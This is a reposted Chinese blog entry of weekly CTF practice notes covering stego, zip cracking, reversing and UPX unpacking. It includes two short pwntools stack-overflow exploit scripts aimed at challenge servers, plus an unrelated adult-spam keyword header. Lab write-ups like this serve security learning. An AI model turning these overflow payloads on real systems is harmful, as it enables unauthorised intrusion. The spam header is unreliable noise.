日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

11.22 这周的CTF刷题

發(fā)布時間:2024/1/18 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 11.22 这周的CTF刷题 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

1.你竟然趕我走

給了個jpg

直接放到010editor

拉到最下面就有

flag{stego_is_s0_bor1ing}

?

2.大白

一張png

提示都給了

那么這么說的話直接修改一下圖片長寬高就行

crc校驗的知識可以課后補一下,簡單說就是,圖片會隱含一個crc的一串字符,和圖片大小有關,大小改變,crc隨之改變,通過特殊手段可以只顯示一部分圖片,此時,crc不變,但是圖片大小改變 會報錯。通過腳本即可還原全部圖片

?還原后得到flag

3.有N種方法解決

解壓附件

是一個exe,但是不能運行

kali file 命令識別一下,是一個txt

打開發(fā)現(xiàn)是一個base64 但是和圖片ka'l有關系,考base64轉(zhuǎn)圖片

找個在線網(wǎng)站?

轉(zhuǎn)換

再用網(wǎng)站掃描一下二維碼就行

?KEY{dca57f966e4e4e31fd5b15417da63269}

4.烏鎮(zhèn)峰會種圖

其實題目不難

是個jpg圖片

我以為要用stegsolve

然后找不到什么線索

然后看了一下照片屬性,發(fā)現(xiàn)沒有注釋什么的

才20kb

直接在010editor打開

然后flag就在最后面

5.基礎破解

非常基礎

就是用軟件暴力破解壓縮包密碼

提示已經(jīng)給了

四位數(shù)字

然后就爆破出來了

解壓

得到txt 然后base64解密即可

flag{70354300a5100ba78068805661b93a5c}

6.pwn1_sctf_2016

C++是真的看不懂 難受~~

查了wp

關鍵點是看似沒有棧溢出,但是實則有個repalce的函數(shù)可以替換

將I替換成you實現(xiàn)棧溢出 然后再將原來的s重新賦值

總之就是很細節(jié)

然后利用棧溢出

加上原本程序里面有個system的函數(shù)

然后就編寫payload了

from pwn import * io = remote('node4.buuoj.cn', 29190) payload = b'I'*20 + b'k'*0x4 + p32(0x8048F0D)#發(fā)送垃圾字符和函數(shù)地址 io.sendline(payload) io.interactive()

7.jarvisoj_level0

一樣的 棧溢出

溢出之后再加上對應的system函數(shù)的地址就行

拿到shell權限之后, 再尋找flag的相關文件就可以

上payload

from pwn import * io=remote('node4.buuoj.cn', 25298) payload = b'a'*(0x80+0x8) +p64(0x400596) io.sendline(payload) io.interactive()

?

?

8.reverse 2

還是看wp寫的?

代碼分析有點問題

?wp說的是? 25行 比較輸入值和flag變量,結果為1就輸出 right flag 說明flag變量就是存著flag

的值,然后查看flag

發(fā)現(xiàn)就是hacking_for_fun}

但是上面還有一個字符的替換 在第19行到第23行

(這里我根本看不懂 明明這個函數(shù)就在上面,為什么會影響到下面的s輸入)

這里替換的機制就是將i和r換成1

所以flag是

flag{hack1ng_fo1_fun}

9.內(nèi)涵的軟件

ida32打開

?這里有一個DBAPP{49d3c93df25caad81232130f3d2ebfad}

還有非常像flag?

DBAPP替換flag

試一下

flag{49d3c93df25caad81232130f3d2ebfad}

沒想到就直接ok了

有點意外

10、新年快樂

簡單的脫殼

先查殼?

upx殼

使用的工具是??

?upx靜態(tài)脫殼工具

脫殼即可

然后分析ida32里的內(nèi)容

?分析一下就可以

flag{HappyNewYear!}

總結

以上是生活随笔為你收集整理的11.22 这周的CTF刷题的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。